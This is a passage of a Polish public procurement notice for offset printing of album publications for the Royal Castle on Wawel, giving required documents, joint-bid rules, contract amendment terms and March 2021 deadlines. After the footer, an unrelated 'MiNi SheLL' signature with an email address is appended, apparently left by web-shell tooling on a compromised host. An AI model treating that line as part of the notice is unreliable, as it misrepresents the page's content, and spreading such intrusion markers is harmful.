</h3> 1) Na potwierdzenie, że zaoferowane usługi spełniają wymagania Zamawiającego określone wopisie przedmiotu zamówienia Wykonawca zobowiązany będzie do przedłożenia:a) jednegoegzemplarza wydrukowanej przez Wykonawcę metodą offsetową publikacji o charakterzealbumowym, w oprawie twardej, szytej, klejonej; b) jednego egzemplarza wydrukowanej przezWykonawcę metodą offsetową publikacji o charakterze albumowym w oprawie miękkiej zeskrzydełkami, szytej, klejonej.Zasady dokonywania oceny jakości przedłożonych wydawnictwokreślone zostały w Rozdziale 9 Specyfikacji Warunków Zamówienia2) W celu umożliwieniadokonania oceny oferty we wskazanym w Rozdziale 20 Specyfikacji Warunków Zamówieniakryterium ”Jakość druku” Wykonawca zobowiązany będzie do przedłożenia wydruku arkusza wformacie B1 (kolor: 4+0) z pliku dołączonego do dokumentacji przetargowej (stanowiącegoZałącznik nr 6 do Specyfikacji), na papierze ARCTIC VOLUME WHITE 130 g/m2 lubrównoważnym, na maszynie offsetowej, na której będą drukowane publikacje wskazane wopisie przedmiotu zamówienia. Zasady przyznawania punktacji we wskazanym kryteriumokreślone zostały w Rozdziale 20 Specyfikacji. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:a) odpis lubinformację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o DziałalnościGospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać zapomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Ofertowymwskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy,Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotówudostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności ww.dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych bazdanych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polskipobranych samodzielnie przez Zamawiającego dokumentów;b) pełnomocnictwo lub innydokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotuudostępniającego zasoby, chyba, że umocowanie do reprezentacji wynika z dokumentów, októrych mowa w pkt. 15.5 lit a) Specyfikacji Warunków Zamówienia;c) pełnomocnictwo lub innydokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnieubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może byćustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania wpostępowaniu i zawarcia umowy;d) zobowiązania wymagane postanowieniami pkt. 10.3Specyfikacji Warunkó Zamówienia, w przypadku gdy Wykonawca polega na zdolnościachpodmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału wpostępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania niewynika z dokumentów, o których mowa w pkt. 15.5 a) SWZ;e) oświadczenie Wykonawcówwspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawyPzp, sporządzone według wzoru stanowiącego Załącznik nr 3 do SWZ;f) oświadczeniewymagane postanowieniami pkt. 9.2., 10.10. i 12.3. SWZ (sporządzone według wzorustanowiącego Załącznik nr 2 do SWZ).g) przedmiotowe środki dowodowe, o których mowa w pkt9.11.1 oraz 9.11.2 SWZ, z tym zastrzeżeniem, że ich przekazanie Zamawiającemu musinastąpić w formie i w sposób określony w pkt 9.13 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadkuWykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust 1 pkt4 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z Rozdziałem 7 Specyfikacji Warunków Zamówienia.3 W przypadku wspólnegoubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 9.2 SWZskłada każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia tepotwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu wzakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału wpostępowaniu.4 W przypadku, gdy spełnienie warunku opisanego:4.1 w pkt. 7.4 SWZ wykazujeco najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia4.2 w pkt.7.4 niniejszej SWZ wykonawcy wykazują poprzez poleganie na zdolnościach tych zwykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.-wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają, które usługiwykonają poszczególni wykonawcy.5 W przypadku wspólnego ubiegania się o zamówienieprzez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć aktualne na dzieńzłożenia podmiotowe środki dowodowe, o których mowa w pkt 9.7 SWZ, przy czym podmiotoweśrodki dowodowe o których mowa w pkt 9.7 pkt a) składa odpowiednio Wykonawca/Wykonawcy,który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt 7.4 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany Umowy mogą być dokonywane wyłącznie w formie pisemnej i wokolicznościach określonych poniżej, tj. w przypadku:a) działania siły wyższej rozumianej, jakozdarzenie nagłe o charakterze zewnętrznym, którego żadna ze Stron Umowy nie mogłaprzewidzieć i na które żadna ze Stron Umowy nie ma wpływu, lub innych okoliczności, którychnie można było przewidzieć albo wystąpienia stanu wyższej konieczności;b) wystąpieniaokoliczności związanych z sytuacją epidemiologiczną, które uniemożliwiają lub znaczącoutrudniają realizację Przedmiotu Umowy;c) konieczności dokonania zmian w PrzedmiocieUmowy w stosunku do postanowień dokumentów, o których mowa w § 1 ust 3 projektu Umowywynikającą z okoliczności, których nie można było przewidzieć na etapie ich tworzenia;d)trudności w opracowaniu Materiałów Wyjściowych;g) zmiany przepisów prawa;i) zmian wzakresie realizacji Przedmiotu Umowy, w tym polegających na zamianie jego elementów lubparametrów na elementy lub parametry o lepszych lub/i odpowiedniejszych cechach chociażbywiązało się to z koniecznością zmiany wynagrodzenia albo terminu lub sposobu wykonaniaPrzedmiotu Umowy;.j) konieczności dokonania zmiany podwykonawcy Przedmiotu Umowy zprzyczyn nie leżących po stronie Wykonawcy;k) zmian organizacyjnych Zamawiającegopowodujących, iż wykonanie części Przedmiotu Umowy staje się bezprzedmiotowel) ustawowejzmiany stawek podatku od towarów i usług, pod warunkiem wykazania przez Wykonawcę, żezmiany te będą miały wpływ na koszty wykonania przez Wykonawcę Przedmiotu Umowy;2. Wprzypadku wystąpienia którejkolwiek z okoliczności wskazanych w pkt 1 Strony, jeżeli będzie tokonieczne, doliczą niezbędny, możliwie najkrótszy czas do terminów wykonania poszczególnychczęści Przedmiotu Umowy, ewentualnie dokonają uzasadnionej zmiany należnego Wykonawcywynagrodzenia. 3.W przypadku ziszczenia się którejkolwiek z przesłanek zmiany treści Umowy,o której mowa w pkt 1 każda ze Stron ma prawo wystąpić do drugiej z pisemnym wnioskiem odokonanie zmiany Umowy.4. Wniosek, o którym mowa w pkt 3 zawiera w szczególnościpropozycję nowych postanowień Umowy i uzasadnienie konieczności dokonania jej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę należy złozyć za pośrednictwem Portalu (sposób jej złożenia opisany został w Rozdziale 18 Specyfikacji Warunków Zamówienia. 2. Przedmiotowe środki dowodowe należy w formie papierowej należy złożyć na adres: Zamek Królewski na Wawelu – Państwowe Zbiory Sztuki, Kancelaria Ogólna, Wawel 8, 31-001 Kraków, do upływu terminu składania ofert (w sposób opisany w Rozdziale 18 SWZ)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-04-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zasady stosowania kryteriów oceny ofert opisane zostały w Rozdziale 20 SWZ.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com